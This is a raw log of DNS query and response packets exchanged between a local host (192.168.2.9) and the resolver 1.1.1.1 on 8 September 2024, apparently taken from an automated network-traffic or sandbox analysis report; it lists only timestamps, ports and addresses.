                                                                                                                                                                                                          Sep 8, 2024 10:53:47.242007971 CEST53514721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.243731976 CEST53565251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.245776892 CEST6083953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.250930071 CEST53513721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.255635977 CEST53608391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.256970882 CEST53530601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.258322954 CEST6551653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261043072 CEST5534353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261143923 CEST53539571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.261581898 CEST53495001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265279055 CEST53652711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265492916 CEST6245853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265659094 CEST5897853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265799046 CEST6318753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.265959024 CEST4928253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.266190052 CEST5499753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.272324085 CEST53494631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.274456024 CEST53589781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.274467945 CEST53655161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.275403023 CEST53631871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.275847912 CEST53624581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.277415037 CEST53553431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.283938885 CEST6226753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.284141064 CEST5252353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291008949 CEST6265153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291181087 CEST5453353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291340113 CEST5242853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291490078 CEST5602553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291626930 CEST5464453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.291770935 CEST6225853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292093992 CEST6470353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292270899 CEST6463353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.292371988 CEST6159553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.293692112 CEST53622671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.293704987 CEST53525231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.294317961 CEST5647253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.296051979 CEST5107753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.297467947 CEST53549971.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.297738075 CEST6225753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.298588037 CEST5764753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.299463987 CEST5279153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.300498009 CEST53560251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.300879002 CEST53524281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301105976 CEST53545331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301577091 CEST6028853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301755905 CEST53622581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.301953077 CEST5952653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.302071095 CEST53615951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.302412987 CEST53646331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.302422047 CEST53546441.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.303708076 CEST53564721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.304023981 CEST5481153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.305953026 CEST53510771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.305963993 CEST53626511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.307904005 CEST53576471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.307917118 CEST53647031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.313853025 CEST53548111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316416979 CEST6031953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316576004 CEST5394853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316736937 CEST6358353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.316920042 CEST5333853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317055941 CEST5642053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317406893 CEST53602881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317481041 CEST6424553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.317969084 CEST6098353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.318121910 CEST5287153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.320467949 CEST6423553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.320738077 CEST6205153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321229935 CEST5277853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321238995 CEST6187053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321429968 CEST6196453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321448088 CEST6417753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.321599007 CEST5585253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.322855949 CEST6543553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.323532104 CEST5627353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.326210022 CEST53533381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.327187061 CEST53635831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.327408075 CEST53609831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.327418089 CEST53564201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.328016996 CEST53642451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.328068972 CEST53528711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.330121040 CEST53527781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.330132961 CEST53618701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.332030058 CEST53642351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.332040071 CEST53619641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.332247972 CEST53654351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.332515001 CEST53595261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.332705021 CEST53603191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.334343910 CEST53558521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.335402966 CEST53620511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.337551117 CEST53641771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.339742899 CEST53562731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.347217083 CEST53539481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.379087925 CEST53636611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.424153090 CEST53492821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.445605993 CEST6308353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.454130888 CEST53622571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.456799984 CEST53630831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.460746050 CEST53527911.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.614526987 CEST5149553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:47.624191046 CEST53514951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.083877087 CEST6359753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.101502895 CEST53635971.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.199573040 CEST5420453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.201853991 CEST6315053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.203505993 CEST5085353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.210232973 CEST53631501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.211554050 CEST6169453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.212462902 CEST5869053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.213002920 CEST6521653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.213288069 CEST53508531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.215919971 CEST53542041.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.221498966 CEST53616941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.223134995 CEST53652161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.224522114 CEST6130153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.226394892 CEST5714553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.226432085 CEST4995953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.227423906 CEST53586901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.228625059 CEST5317053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.228750944 CEST6489453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.230705976 CEST5978353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.231332064 CEST5123753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.234410048 CEST5106753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236035109 CEST5115553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236272097 CEST53571451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236541033 CEST6075653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236639023 CEST53499591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236736059 CEST5934853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.236929893 CEST5854653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.240856886 CEST53613011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.241780996 CEST5075553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.242149115 CEST6126853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.244707108 CEST53531701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.244750023 CEST53510671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.246548891 CEST6214153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.246578932 CEST53597831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.246592999 CEST53585461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.246850967 CEST4954953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.247025967 CEST5841153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.248636007 CEST5404253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.250150919 CEST5148753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.251349926 CEST53507551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.251945019 CEST53612681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.254029989 CEST6333453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.254220963 CEST5187353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.254863977 CEST53607561.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.254889011 CEST53511551.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.256117105 CEST53621411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.256731033 CEST53584111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.256809950 CEST5047353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.257019043 CEST53495491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.260329962 CEST53514871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.261908054 CEST53512371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.263720989 CEST53518731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.264163971 CEST6012453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.264988899 CEST53540421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.267172098 CEST53593481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.274950981 CEST5767153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.276391983 CEST5008353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.279320955 CEST53601241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.284730911 CEST53576711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.286231041 CEST53500831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.288326025 CEST53504731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.292284012 CEST6180953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.298433065 CEST5006053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.298607111 CEST6200753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.299047947 CEST6381253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.302927971 CEST53618091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.308568001 CEST53620071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.308756113 CEST53500601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.309231043 CEST53638121.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310601950 CEST6430553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310657024 CEST6318553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310808897 CEST5031953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.310931921 CEST6152453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.319593906 CEST53643051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.319884062 CEST53631851.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.320131063 CEST53503191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.341064930 CEST53615241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359214067 CEST6449453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359349966 CEST5192553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.359673023 CEST5063053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361310005 CEST6277253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361454010 CEST5870053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361732960 CEST6523653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.361749887 CEST5058353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.369076014 CEST53506301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.369199038 CEST53644941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.377437115 CEST53652361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.377717018 CEST53505831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.377912045 CEST53587001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.385482073 CEST53648941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.390306950 CEST53519251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.391546011 CEST53627721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.419847012 CEST53633341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458461046 CEST5291553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458724976 CEST5693353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458966970 CEST5602653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.458990097 CEST5840853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459230900 CEST6027153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459539890 CEST5440153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459553003 CEST5972653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459834099 CEST5642053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.459867954 CEST5601353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460258007 CEST5592553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460319996 CEST6057753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.460566998 CEST6100153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.461606026 CEST6183553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.462905884 CEST4943953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.463100910 CEST6130953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.463288069 CEST6441553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.466025114 CEST5024353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.467562914 CEST53529151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.467974901 CEST53569331.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.468781948 CEST53602711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.469110012 CEST53544011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.469134092 CEST53560261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.469862938 CEST53605771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.470139980 CEST53597261.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.470768929 CEST53559251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.471529007 CEST53560131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.472610950 CEST6336653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.472819090 CEST53494391.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.473263025 CEST53613091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477140903 CEST53502431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477195024 CEST53584081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477209091 CEST53564201.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.477220058 CEST53618351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.478023052 CEST53610011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.479780912 CEST53644151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.483355999 CEST53633661.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.890337944 CEST5445953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.891731977 CEST5283553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.892016888 CEST5852553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.899847984 CEST53544591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.902776957 CEST5246753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.906666994 CEST53585251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.908406973 CEST53528351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.912209034 CEST5511953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.912213087 CEST53524671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.913156033 CEST5653453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.913569927 CEST5322253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.920531988 CEST5075253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921243906 CEST5383853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921467066 CEST5049853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921596050 CEST53551191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.921684027 CEST6117253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.922410011 CEST5513753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.923106909 CEST53532221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.924055099 CEST6441353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.925297976 CEST6091953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.926645041 CEST6423153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.928010941 CEST6354653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.928638935 CEST53565341.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.930910110 CEST53507521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.931025028 CEST53611721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.931524992 CEST53538381.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.933926105 CEST53644131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.934798956 CEST53609191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.936042070 CEST53642311.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.936975956 CEST53635461.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.937633991 CEST53504981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.938149929 CEST53551371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.942358971 CEST5584753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.942646027 CEST5151953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.943227053 CEST6157353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.943736076 CEST5372853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.943952084 CEST5774153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.952274084 CEST53515191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.952510118 CEST53577411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.953434944 CEST53537281.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.953444958 CEST53615731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.962413073 CEST5583253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964286089 CEST6108853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964497089 CEST5090553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964741945 CEST6219853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.964931965 CEST5533453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.965142012 CEST5032453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966058969 CEST6063253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966365099 CEST6032353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966645002 CEST5380853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.966814995 CEST4959653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:53:48.970467091 CEST5878353192.168.2.91.1.1.1
